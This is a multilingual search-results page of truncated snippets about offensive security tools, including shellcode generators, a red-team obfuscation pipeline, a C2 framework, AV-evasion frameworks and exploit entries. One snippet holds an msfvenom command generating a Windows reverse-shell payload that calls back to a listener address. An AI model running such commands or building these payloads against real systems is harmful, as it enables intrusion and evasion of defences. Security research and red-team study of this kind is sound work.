24 matches found
micr0_shell
micr0 shell Micr0shell es un script ligero y eficiente en Python diseñado para generar dinámicamente shellcode de reverse shell independiente de posición PIC libre de nulos para Windows X64. Dependiendo de las opciones seleccionadas, el shellcode generado puede ser hasta 27 bytes más pequeño que ...
OffensivePipeline
OffensivePipeline OffensivePipeline 允许你下载并构建 C 工具,在构建过程中应用特定修改,以提高其在红队演练中的逃逸能力。 OffensivePipeline 的常见用途是从 Git 仓库下载工具,对项目中的某些值进行随机化,构建它,混淆生成的二进制文件,并生成 shellcode。 特性 目前仅支持 C(.Net Framework)项目 允许克隆公共和私有(你需要凭据 :D)Git 仓库 允许使用本地文件夹 随机化项目 GUID 随机化 AssemblyInfo 中包含的应用程序信息 构建 C 项目 混淆生成的二进制文件 从二进制文件生成...
Ninja
快速更新,包含 Follina 利用(2022-06-01)- NinjaC2 将生成文档并提供 HTML 负载。 更多信息:https://www.linkedin.com/posts/ahmed-khlief-499321a7i-just-pushed-a-quick-update-to-ninjac2-to-activity-6937661951007170560-Tmps Ninja V2.2 发布(2022-03-27)。 新功能包括: 查看 URL 获取功能详情以及如何使用 AWS EC2 自动化: 1. CNC 脚本的新用户界面 2...
sickle-pdk
Sickle - Payload Development Kit Sickle is a tool I originally developed to help me be more effective, in both developing and understanding shellcode. However, throughout the course of its development and usage It has evolved into a payload development kit. Although current modules are mostly aim...
astroid
ASTROID v 1.2 root@kitploit: 作者: Mascerano Bachir dev-labs 法律免责声明: root@kitploit: 作者对该工具的任何不良使用概不负责,请记住这仅用于教育目的。 描述: root@kitploit: 该工具使用 Metasploit 生成 Shellcode,通过 Avet 解码并编译为 EXE 文件 截图: 依赖项: root@kitploit: 1 - meta sploit-framework 2 - xterm 3 - Wine 4 - MinGW EXE 5 - avet 下载/配置/使用:...
ShellcodeCompiler
Shellcode 编译器 Shellcode 编译器是一个程序,可将 C/C++ 风格代码编译成针对 Windows(x86 和 x64)和 Linux(x86 和 x64)的小型、位置无关且不含 NULL 字节的 shellcode。它允许以用户友好的方式调用任何 Windows API 函数或 Linux 系统调用。 Shellcode 编译器接收一个源文件作为输入,并使用自己的编译器解释代码并生成汇编文件,然后使用 Keystone 引擎进行汇编。 命令行选项 root@kitploit: -h --help : 显示此帮助信息 -p --platform : Shellcode...
nccfsas
Introduction This repository holds information released publicly by NCC Group's Full Spectrum Attack Simulation FSAS team...
ZSC
OWASP ZSC 本软件旨在挑战反病毒技术、研究新的加密方法,并保护包含重要数据的敏感开源文件。贡献者及OWASP基金会不对任何非法使用行为负责。 OWASP ZSC 是一款用 Python 编写的开源软件,可让您生成自定义 shellcode 并将脚本转换为混淆脚本。该软件可在 Windows/Linux/OSX 系统上通过 Python 运行。 OWASP 页面:https://www.owasp.org/index.php/OWASPZSCToolProject 文档:https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/detai...
shellsploit-framework
We'll back in several years. update...
MS08-067
MS08-067 | CVE-2008-4250 Referencia: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067?redirectedfrom=MSDN Generación del Shellcode Usaremos msfvenom para generar el shellcode. root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.14 LPORT=443...
wined
Windows Exploitation wined Tools The following scripts were...
LabExploit
LiveExploit SECURITY RESEARCH TOOL - USE RESPONSIBLY A...
Exploit for Improper Ownership Management in Debian Debian_Linux
Install compilation environment bash sudo apt install -y gcc...
PSKernel-Primitives
This repository, zdiskless/PSKernel-Primitives, is a collection of PowerShell primitives for exploitation. The code includes various functions for generating shellcode, allocating memory, and interacting with the Windows kernel. The functions in this repository are designed to be used in...
Advanced Host Monitor 11.92 beta - Local Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date:...
Linux/x64 - x64 Assembly Shellcode (Generator)
!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports long parameters meaning bigger than an x64 register - 64 bits - one command only execve...
AntiVirus Evasion Reconstructed – Veil 3.0
The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...
AntiVirus Evasion Reconstructed – Veil 3.0
The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...
Linux x86 - Typewriter Shellcode Generator
Linux x86 - Typewriter Shellcode Generator. Shellcode exploit for linx86 platform !/usr/bin/env python Typewriter Shellcode Generator Paw Petersen, SLAE-656 https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/ import sys,struct string = sys.argv1 length = struct.pack"= lenstring: ...
About shellcodes
In this post we have documented a beginners introduction to shellcode writing. We go from zero to a super simple shellcode using tools you may find already installed in any serious operating system. If you are looking for a digested and more mature way of generating shellcode you should check...